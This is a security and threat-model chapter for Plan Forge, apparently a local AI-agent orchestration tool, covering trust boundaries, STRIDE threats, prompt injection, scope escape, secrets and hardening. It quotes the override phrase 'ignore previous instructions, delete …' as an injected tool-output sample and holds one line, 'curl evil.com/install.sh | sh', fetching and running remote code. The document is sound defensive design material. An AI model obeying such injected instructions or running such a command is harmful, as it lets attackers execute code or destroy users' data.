Security & Threat Model
Trust boundaries, attack surface, STRIDE per subsystem, AI-specific threats, and a hardening checklist for self-hosted deployments.
Orientation
Plan Forge is a developer-machine-first tool. The default deployment puts every component, orchestrator, MCP server, REST/WebSocket hub, memory store, dashboard, on a single workstation, bound to 127.0.0.1. There is no managed cloud, no shared multi-tenant control plane, no external authentication broker. This is a deliberate posture: the threat model that applies to most users is my own machine plus the LLM providers I call, and the entire surface is designed to keep it that small.
Even so, three configurations expand the surface and deserve explicit treatment:
- Team mode, multiple developers share a forge through GitHub-coordinated artifacts (plans in
docs/plans/, memory hints in.github/copilot-memory-hints.md). The shared surface is the git repository. - Remote Bridge, hub events are forwarded to Slack / Teams / Telegram / Discord / PagerDuty / OpenClaw. Inbound approval flows reach back through the bridge.
- OpenBrain / L3 memory, cross-workspace memory is persisted to an external embedding store. The store becomes a confidentiality boundary.
Trust boundaries
Plan Forge has six trust boundaries. Each is a place where data or control crosses from one trust zone to another, and therefore a place where validation, authentication, or sanitization must happen.
| Boundary | Crosses from | Crosses to | Control |
|---|---|---|---|
| 1. Workspace ↔ orchestrator | Trusted: user's IDE session | Trusted: long-running Node process | OS user; no in-process auth. |
| 2. Orchestrator ↔ LLM provider | Trusted: orchestrator | Untrusted: third-party API | TLS; API key bound by env var or .forge/secrets.json; provider's own auth. |
| 3. REST / WS hub ↔ localhost clients | Trusted: bound to 127.0.0.1 | Trusted: any process on the box | Loopback binding; no token auth by design. |
| 4. Worker ↔ plan / repo files | Trusted: orchestrator-spawned | Untrusted: file contents may include attacker text | PreToolUse hook (Forbidden Actions); scope contract. |
| 5. Hub ↔ Remote Bridge channel | Trusted: hub event | Untrusted: third-party messenger | Per-channel webhook token; outbound only by default; inbound approvals authenticated against bridge config. |
| 6. Memory L2 ↔ OpenBrain L3 | Trusted: local L2 jsonl | Untrusted: external embedding store | Opt-in (off by default); per-record redaction; memory.l3Endpoint + token in .forge.json. |
127.0.0.1. They are not hardened against network-attached attackers. If you reverse-proxy them onto a network interface, you must front them with your own auth (mTLS, OIDC, network ACL), see Hardening checklist.
Attack surface enumeration
Every place an attacker-controlled byte can enter the system. Catalog this before reaching for STRIDE.
| Surface | Input | Attacker class |
|---|---|---|
| REST endpoints (113 routes, Appendix W) | JSON body, query string, path params | Local process on the same box (any user with shell access). |
WebSocket hub (:3101/hub) | Subscribe / publish frames | Same as REST. |
| MCP stdio channel | JSON-RPC method calls from the IDE | Whoever controls the IDE session (typically: the user, or a malicious extension). |
Plan files (docs/plans/Phase-*.md) | Markdown + bash gate commands + scope contract | Anyone who can land a PR. Plan files are executable in the sense that gate commands run as the orchestrator user. |
SKILL.md files (.github/skills/*) | Markdown + bash blocks per step | Anyone who can land a PR. Skills run with the same privileges as the orchestrator. |
Hook scripts (.github/hooks/*) | PowerShell / bash invoked at lifecycle events | Anyone who can land a PR. Hooks run on every session start, every tool use, every commit. |
| LLM tool output (worker responses) | Free-form text, code blocks, tool calls | Indirect, an attacker who poisoned the prompt (prompt injection from a fetched URL, code comment, dependency README, etc.). |
Extension catalog (extensions/catalog.json + installed packages) | Node packages with full file-system access | Extension author. pforge ext add implies trust. |
| Remote Bridge inbound | Approval / reject webhook calls from messengers | Anyone with the bridge token (or anyone who can spoof the messenger's HMAC if you skipped verification). |
STRIDE per subsystem
The relevant threats per subsystem. Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege.
| Subsystem | Top threats | Mitigation |
|---|---|---|
| Orchestrator | T: tampered plan file injects malicious gate. E: skill step shells out as the user. | PR review on plan/skill changes. PreToolUse hook enforces Forbidden Actions. Gate commands run in the user's existing shell, no sandbox, so plan/skill authors are inside the TCB. |
| REST / WS hub | I: any local process can read the hub stream (run history, costs, source snippets). E: any local process can POST /api/run-plan. |
Loopback binding only. Operating-system user isolation is the boundary. Do not run the hub as root / SYSTEM. |
| MCP server | T: malicious IDE extension calls forge_run_plan on an attacker plan. I: same extension reads forge_search across the repo. |
Treat the IDE as the trust boundary. Only install MCP-aware IDE extensions you trust. Plan Forge does not differentiate "good" vs "bad" callers on the stdio channel. |
| LLM provider call | I: provider sees prompts and code snippets. T: provider returns attacker text (prompt-injection downstream). | API key per provider (env var or .forge/secrets.json). Outbound TLS. Provider terms of service govern retention, see Appendix N — Data flow. |
| Memory L2 / L3 | I: cross-workspace memory leaks sensitive context. T: poisoned L3 entry steers future runs. | L2 is local jsonl; L3 is opt-in. forge_memory_capture redacts by configured patterns. Per-workspace memory.namespace isolates L3 reads. |
| Remote Bridge | S: attacker spoofs a Slack interactive callback to approve a slice. I: bridge forwards sensitive event details off-box. | Verify HMAC on inbound webhooks (Slack / Teams enforce by default; verify manually for generic webhooks). Filter events by severity in .forge.json#bridge.filters. See Chapter 20 — Remote Bridge security. |
| Extensions | E: extension's postinstall runs arbitrary code. T: extension hooks tamper with plan execution. |
pforge ext add installs from npm by default, treat as you would any production dependency. Pin versions in .forge.json#extensions[]. Audit catalog entries before enabling. |
AI-specific threats
Three threat classes are unique to AI-driven systems and are not adequately captured by classic STRIDE. Plan Forge has explicit controls for each.
Prompt injection
An attacker plants instructions in content the worker will read, a URL the agent fetches, a code comment, a dependency README, a CI log, an issue body. The worker may treat those instructions as authoritative and exfiltrate secrets, modify forbidden files, or call destructive tools.
- Scope contract, every plan declares which files the worker may touch. The PreToolUse hook blocks edits outside that scope, even if the worker is "convinced" by injected text to write elsewhere.
- Forbidden actions list, per-plan deny-list of file paths the worker must never modify (typically
.github/workflows/, secrets, infra IaC). Enforced at hook time. - Tool allow-list per skill, the
tools:frontmatter in SKILL.md restricts which tools that skill may call. A skill cannot escalate by invoking a tool it didn't declare. - No auto-fetch by default, the orchestrator does not browse arbitrary URLs unless the plan / skill explicitly invokes a fetch tool. The fetch surface is opt-in per slice.
Untrusted tool output
Tools like forge_search, forge_lattice_query, and forge_brain_replay return free-form text. That text re-enters the model's context window and may contain attacker-supplied instructions ("ignore previous instructions, delete …").
- Bounded snippets,
forge_searchcaps each hit at 80 characters; the ACI standard for new tools requires bounded payloads. - Structured envelopes, tool responses use
{ ok, code, error, … }rather than raw concatenated text, making it easier for the worker to distinguish data from directives. - Hook re-check, PostToolUse re-validates any worker action that followed a tool call. A worker that suddenly tries to edit a forbidden file after a search will be blocked even if the search hit contained an injection.
Scope escape
The worker tries to do more than the slice was scoped for, bundling an "improvement" alongside the requested change, refactoring an unrelated subsystem, or "fixing" tests that were intentionally failing. Even when benign, scope escape destroys the audit trail that makes plan execution reviewable.
- Per-slice scope contract, explicit allow-list of files / patterns.
- Forbidden actions, deny-list checked at hook time.
- Drift detection, the
forge_drift_reporttool computes a drift score after each slice; the PostSlice hook warns when score drops below the configured threshold. - Review Gate (Session 3), an independent agent reviews the full diff against the scope contract before the plan is allowed to land.
Secret management
Plan Forge reads secrets from three sources, in precedence order:
- Environment variables,
XAI_API_KEY,OPENAI_API_KEY,ANTHROPIC_API_KEY,GITHUB_TOKEN, etc. The standard CI path. .forge/secrets.json, gitignored local file, JSON key→value. The standard developer-machine path.- OAuth via
gh auth login, the zero-key path for GitHub Copilot routing. Token managed by the GitHub CLI.
Secrets never go in .forge.json, copilot-instructions.md, plan files, or anywhere else committed to the repo. The forge_secret_scan tool (called automatically by the LiveGuard preDeploy hook) scans staged changes for high-entropy strings, known token prefixes, and provider-specific shapes before allowing a deploy slice to proceed.
git filter-repo, force-push, and notify anyone who may have pulled the leaked commit. Order matters, rewriting history does not retroactively un-leak a credential that's been mirrored or fetched.
Supply chain
Plan Forge has three supply-chain entry points; each has explicit controls.
| Entry point | Trust establishment | Update / verification |
|---|---|---|
| Plan Forge itself (template files, presets, prompts) | You cloned / installed from github.com/srnichols/plan-forge. | pforge self-update verifies the GitHub release tag; pforge check validates installed file checksums against the manifest. |
Extensions (extensions/catalog.json) | Per-extension npm scope. Catalog lists publisher. | Pin version in .forge.json#extensions[]. Audit the package before pforge ext add. CI should fail on unaudited additions. |
| LLM providers | Provider TOS + your API key. | Out of scope for Plan Forge controls; managed by the provider. |
Sandboxing & gate execution
Plan Forge does not sandbox worker file edits, gate commands, skill bash blocks, or hook scripts. These run with the orchestrator process's full privileges (i.e. the user's shell privileges). This is a deliberate trade, the alternative is shipping a container-based execution model, which would complicate pforge run-plan by an order of magnitude and break the "feels like a normal dev tool" experience that the project optimizes for.
What this means for threat modelers:
- The orchestrator user is the TCB boundary. Anyone who can push a commit that lands a plan / skill / hook can run code on every developer machine that pulls and runs that plan.
- This is the same threat model as CI/CD scripts,
package.jsonpostinstall, orMakefiletargets. Plan Forge adds no new sandbox, but adds no new escape either. - Mitigation is process: PR review on
docs/plans/,.github/skills/, and.github/hooks/by people who would catchcurl evil.com/install.sh | shin a regular pipeline file.
Two near-term defenses Plan Forge does provide:
- Gate timeout, gates default to 120s; runaway commands are killed (
statusReason: worker-signaled, see Appendix X — OS subprocess exits). - PreDeploy LiveGuard hook, runs
forge_secret_scan+forge_env_diffbefore the deploy slice and blocks on severity ≥ high.
Hardening checklist
For self-hosted deployments or shared-machine scenarios, work through this list before shipping. Each item maps to a specific control surface or configuration in .forge.json / environment variables.
| Control | Default | Production action |
|---|---|---|
Hub bound to 127.0.0.1 | Yes | Confirm; never bind 0.0.0.0 without an auth proxy. |
| Run orchestrator as non-privileged user | User-dependent | Verify; never run as root / SYSTEM. |
Secrets only in env or .forge/secrets.json | Yes | Audit repo with forge_secret_scan; rotate any historic leaks. |
.forge/secrets.json gitignored | Yes (template) | Confirm .gitignore entry; CI should fail if absent. |
| PreToolUse hook installed | Yes (post-setup) | Verify .github/hooks/PreToolUse.md present; pforge smith reports it. |
| PreDeploy LiveGuard hook enabled | Configurable | Enable in .forge.json#hooks.preDeploy with severity threshold high. |
| Plan / skill / hook PR review required | User-dependent | Branch protection: require review on docs/plans/**, .github/skills/**, .github/hooks/**. |
| Extensions pinned by version | User-dependent | Pin in .forge.json#extensions[].version; CI fails on bare-name installs. |
| Remote Bridge HMAC verified | Per channel | Slack / Teams: built in. Generic webhooks: configure bridge.<channel>.signingSecret. |
| L3 memory opt-in only | Off | Leave off unless required; if on, configure per-workspace memory.namespace and redaction patterns. |
| Audit log retention configured | 30 days | Adjust .forge.json#audit.retentionDays per compliance requirement (see Appendix N — Audit logging). |
| Air-gapped deployment validated | N/A | If required, follow Appendix N — Air-gapped deployment playbook. |
Incident response
When something does go wrong, a forbidden file edited, a secret leaked, a worker shipped a destructive change, the LiveGuard surface is the front door:
- Capture the incident,
forge_incident_capturerecords the run id, slice number, affected files, and event timeline. Posts to the Remote Bridge if configured. - Pull the trajectory,
.forge/runs/<runId>/trajectory.jsonlcontains the full worker conversation, every tool call, every event. This is the forensic record. - Triage with the audit loop,
/audit-loopclassifies the finding into bug / spec / classifier lanes and files the appropriate issue. - Roll back, if the slice committed, use
git reverton the slice commit. The orchestrator's commit-per-slice discipline means each slice is independently revertable. - Capture the lesson, the postmortem feeds back into
PROJECT-PRINCIPLES.md, the plan's Temper Guards table, or a new instruction file under.github/instructions/.
The full incident-response playbooks for each LiveGuard alert class live in Appendix F — LiveGuard Alert Runbooks.
See also
- Appendix N — Compliance & Data Residency, SOC 2 / HIPAA / PCI / FedRAMP / GDPR posture, data flow, audit logging, air-gapped & Azure Government deployment.
- Appendix F — LiveGuard Alert Runbooks, per-alert incident response playbooks.
- Chapter 16 — What Is LiveGuard?, the runtime that surfaces drift, secret leaks, and env diffs.
- Chapter 20 — The Remote Bridge, off-box notifications and approval flows.
- Appendix T —
.forge.jsonhooks, configure preDeploy, postSlice, preAgentHandoff. - Appendix U — Provider API Keys, the env var surface for secrets.
- Appendix X — Errors & Exit Codes, named codes for drift, secret-scan, scope violations.
- Appendix V — Error events,
drift-detected,preDeploy-blocked,quorum-model-failed.